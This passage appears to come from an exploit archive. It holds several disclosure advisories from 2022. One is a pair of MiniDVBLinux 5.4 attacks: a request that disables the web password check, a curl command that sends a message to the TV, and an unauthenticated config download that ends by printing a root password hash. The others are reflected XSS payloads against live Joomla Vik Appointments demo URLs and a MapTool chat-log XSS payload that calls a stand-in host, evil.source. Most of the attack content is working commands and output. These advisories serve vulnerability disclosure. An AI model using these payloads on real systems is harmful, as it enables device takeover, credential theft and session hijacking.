/>SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br />TIMEZONE_command: /etc/setup/locales.sh settimezone<br />TIMEZONE: Europe/Berlin<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />WEBIF_PASSWORD_CHECK: 1<br />action: save<br />params: <br />changed: WEBIF_PASSWORD_CHECK <br /><br /><br />Disable webif password check:<br />-----------------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: /etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: <br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br />SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br />TIMEZONE_command: /etc/setup/locales.sh settimezone<br />TIMEZONE: Europe/Berlin<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />action: save<br />params: <br />changed: WEBIF_PASSWORD_CHECK <br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application allows the usage of the SVDRP protocol/commands<br />to be sent by a remote attacker to manipulate and/or control remotely<br />the TV.<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5714<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />Send a message to the TV screen:<br /><br />curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!<br /><br />220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8<br />250 Message queued<br />221 mld closing connection<br /><br />For more commands:<br /> - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands<br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Config Download Exploit<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application is vulnerable to unauthenticated configuration<br />download when direct object reference is made to the backup function<br />using an HTTP GET request. This will enable the attacker to disclose<br />sensitive information and help her in authentication bypass, privilege<br />escalation and full system access.<br /><br />====================================================================<br />/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:<br />------------------------------------------------------------<br />01: <?<br />02: if [ "$GET_action" = "getconfig" ]; then<br />03: . /etc/rc.config<br />04: header "Content-Type: application/x-compressed-tar"<br />05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"<br />06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null<br />07: cat /tmp/backup_config_$$.tgz<br />08: rm -rf /tmp/backup_config*<br />09: exit<br />10: fi<br />11: ?><br />12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div><br /><br />====================================================================<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5713<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz<br />> mkdir configdir<br />> tar -xvzf config.tgz -C .\configdir<br />> cd configdir && cd etc<br />> type passwd<br />root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh<br />daemon:!:1:1::/:<br />ftp:!:40:2:FTP account:/:/bin/sh<br />user:!:500:500::/home/user:/bin/sh<br />nobody:!:65534:65534::/tmp:<br />_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin<br />> <br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Appointments 1.7.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />GET parameter 'filters[group]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /> <br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=ehfso%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ejo07p&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[country]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=f1zzs%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3etpj3q&filters[distance]=5&filters[price]=25:300&start=5<br /><br /><br />GET parameter 'filters[service]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=h9ool%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3euskap&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[distance]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=zi0c7%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3esw7i1&filters[price]=25:300&start=5<br /><br /><br />GET parameter 'filters[price]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=5&filters[price]=ofwz2%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3efixld&start=5<br /><br />GET parameter 'filters[state]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=j4qvq%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ev0uw9&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[field_experience]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=ib06r%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebsg9b&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Document Title:<br />===============<br />MapTool v1.11.5 - Cross Site Scripting Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2319<br /><br /><br />Release Date:<br />=============<br />2022-10-11<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2319<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps<br />but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects,<br />and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight.<br />The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change<br />may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds,<br />but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not<br />work on older versions, so be careful with your campaign files when trying out development builds.<br /><br />(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool )<br />(Download Software:https://www.rptools.net/toolbox/download-rptools-products )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent web vulnerability in the official MapTool v1.11.5 software.<br /><br />Affected Product(s):<br />====================<br />Rptools<br />Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-06-03: Researcher Notification & Coordination (Security Researcher)<br />2022-06-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-11: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the official MapTool v1.11.5 software.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector<br />to compromise browser to web-application requests from the application-side.<br /><br />The vulnerability is located in the Speicher den Nachrichtenverlauf (Save Message Logs) function that exports<br />without a secure encode of html entities. Thus allows remote attackers to send malicious payloads that are not<br />visible in the chat but being saved to the exported html file. Opening the html file directly executes the injected<br />script code payloads on the local computer system. The vulnerability can be used by actors to form malicious files<br />for malware, phishing or data exfiltration after locat compromise.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent<br />external redirects to malicious source and persistent manipulation of affected application modules.<br /><br />Vulnerable Module(s):<br />[+] Chat<br /><br />Affected Module(s):<br />[+] Speicher den Nachrichtenverlauf<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent and non-persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with or without low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Payload<br /><iframe src="http://evil.source/malicious.jsp?inject=<script>eval(name)</script>" name="alert(1337)"></iframe><br /><br /><br />Manual steps to reproduce the vulnerability:<br />1. Install the linux, windows or macos map software<br />2. Open the chat and inject payload<br />3. Send the input to execute<br />4. Save the chat logs by settings (default html)<br />5. Open the exported html file with the chat communication<br />Note: Opening the file directly executes the payload<br />6. Successful reproduce of the non-persistent and persistent input validation vulnerability<br /><br /><br />PoC: Exploitation (test.html)<br /><table class="ava-msg"><br /><tbody><tr valign="top"><br /><td class="avatar"><br /></td><br /><td class="message"><br /><span class="prefix">Anonymer Benutzer:</span> <span><font color="#000000">evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT]</font></span><br /></td><br /></tr><br /></tbody></table><br /></div><br /><div><br />"antlr.collections.AST.equalsTree(antlr.collections.AST)" because<br />"this.tree" is null Fehler beim Ausführen des Ausdrucks .<br /></div><br /><div><br />Fehlerspur: chat<br /></div><br /><div><br />"antlr.collections.AST.equalsTree(antlr.collections.AST)" because<br />"this.tree" is null Fehler beim Ausführen des Ausdrucks .<br /></div><br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent script code injection vulnerability in the maptool software is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>